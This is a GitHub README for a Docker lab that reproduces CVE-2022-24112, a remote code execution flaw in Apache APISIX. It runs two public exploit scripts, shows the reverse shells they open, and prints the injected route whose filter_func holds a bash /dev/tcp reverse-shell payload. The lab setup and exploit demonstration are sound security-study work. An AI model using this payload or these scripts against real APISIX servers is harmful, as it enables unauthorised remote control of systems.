WULINPIN/cve-2022-24112

Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab

Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab

Let's clone using gitclone this repository, then we can navigate to apisix-docker/examples. In this docker-compose.yml file, we already change into image: apache/apisix:2.12.0-alpine, because the vulnerability in this version, then let's install using docker compose.

QuickStart via docker-compose,we can start all modules with docker-compose.

$ cd example
$ docker-compose -p docker-apisix up -d

Let's use this command docker ps -a to make sure the docker images already runs in the background. after this is done, we can access the API with a simple curl

$ curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2022 15:49:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600

{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}

• poc.py. exploit usage python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444

$ python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444

                                   .     ,                                                                          
        _.._ * __*\./ ___  _ \./._ | _ *-+-                                                                         
       (_][_)|_) |/'\     (/,/'\[_)|(_)| |                                                                          
          |                     |                                                                                   
                                                                                                                    
                (CVE-2022-24112)                                                                                    
{ Coded By: Ven3xy  | Github: https://github.com/M4xSec/ }
 

reverse shell connection

$ nc -lvnp 4444                       
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52334
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 .
drwxr-xr-x    1 root     root          4096 Jan 28 09:06 ..
drwxr-xr-x   13 root     root          4096 Jan 28 09:07 apisix
drwx------    2 nobody   root          4096 Mar 20 15:48 client_body_temp
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 conf
drwxr-xr-x    5 root     root          4096 Jan 28 09:07 deps
drwx------    2 nobody   root          4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x    2 1000     1000          4096 Mar 20 15:48 logs
drwx------    2 nobody   root          4096 Mar 20 15:48 proxy_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 scgi_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 uwsgi_temp

• poc2.py. exploit usage python3 poc2.py -h

$ python3 poc2.py -h                                        

    >> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
    >> by twseptian

usage: poc2.py [-h] -t TARGET_IP -p TARGET_PORT -L LOCALHOST -P LOCALPORT

Apache APISIX 2.12.1 - Remote Code Execution (RCE)

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET_IP, --rhost TARGET_IP
                        Target IP
  -p TARGET_PORT, --rport TARGET_PORT
                        Target Port
  -L LOCALHOST, --lhost LOCALHOST
                        Localhost/Local IP
  -P LOCALPORT, --lport LOCALPORT
                        Localport

exploit usage python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444

$ python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444

    >> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
    >> by twseptian

[!] Take RCE

listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52372
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 .
drwxr-xr-x    1 root     root          4096 Jan 28 09:06 ..
drwxr-xr-x   13 root     root          4096 Jan 28 09:07 apisix
drwx------    2 nobody   root          4096 Mar 20 15:48 client_body_temp
drwxr-xr-x    1 root     root          4096 Mar 20 15:48 conf
drwxr-xr-x    5 root     root          4096 Jan 28 09:07 deps
drwx------    2 nobody   root          4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x    2 1000     1000          4096 Mar 20 15:48 logs
drwx------    2 nobody   root          4096 Mar 20 15:48 proxy_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 scgi_temp
drwx------    2 nobody   root          4096 Mar 20 15:48 uwsgi_temp

$ curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' | jq
{
  "count": 1,
  "action": "get",
  "node": {
    "key": "/apisix/routes",
    "nodes": [
      {
        "modifiedIndex": 161,
        "value": {
          "priority": 0,
          "uri": "/rms/fzxewh",
          "status": 1,
          "upstream": {
            "hash_on": "vars",
            "pass_host": "pass",
            "nodes": {
              "schmidt-schaefer.com": 1
            },
            "type": "roundrobin",
            "scheme": "http"
          },
          "id": "index",
          "create_time": 1647791428,
          "filter_func": "function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/172.18.0.1/4444;/bin/sh <&160 >&160 2>&160\\\"'); return true end",
          "update_time": 1647799320,
          "name": "wthtzv"
        },
        "key": "/apisix/routes/index",
        "createdIndex": 16
      }
    ],
    "dir": true
  }
}

Credits

• Apache APISIX Docker - Manual deploy apisix via docker
• Apache APISIX < 2.12.1 Remote Code Execution
• Exploit-DB - Apache APISIX 2.12.1 - Remote Code Execution (RCE)
• GitHub - Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit